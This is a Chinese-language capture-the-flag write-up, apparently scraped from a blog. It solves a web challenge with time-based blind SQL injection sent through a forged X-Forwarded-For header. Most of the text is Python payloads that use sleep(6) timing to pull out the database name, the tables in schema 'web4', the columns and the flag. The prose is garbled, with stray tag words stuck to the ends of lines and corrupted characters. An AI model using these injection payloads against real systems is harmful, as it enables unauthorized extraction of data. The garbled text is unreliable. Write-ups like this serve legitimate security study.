打开连接,展现内容以下所示:python
分析:首先想到这多是要伪造ip的题目,而后利用伪造IP的HTTP头(例如:X-Forwarded-For等)。burp中成功进行伪造,以下图所示:web
响应结果:sql
发现能够成功进行伪造,可是这些sql语句好像字符串化了,看起来并不具备判断性,接下来怎么办呢?数据库
时间型的盲注?!code
利用select case when() then end语句,根据响应时间的差别判断数据库长度,数据库表名,列名等,盲注语句以下所示:orm
# length of database # header = {"X-Forwarded-For":"'+(select case when(select(length(database()))>%s) then 0 else sleep(6) end) and 'a'='a" % i} # name of database # header = {"X-Forwarded-For": "'+(select case when (substring((select database()) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i,j)} # length of table # header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i} # name of table # header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';')" # " from information_schema.tables where table_schema='web4') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % ( # i, j)} # length of column # header = { # "X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';') " # "from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') " # "then sleep(6) else 0 end) and 'a'='a" % i} # name of column # header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';')" # " from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % ( # i, j)} # length of flag # header = { # "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') " # "from flag) from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i} # name of flag header = { "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') " "from flag) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
结果以下:blog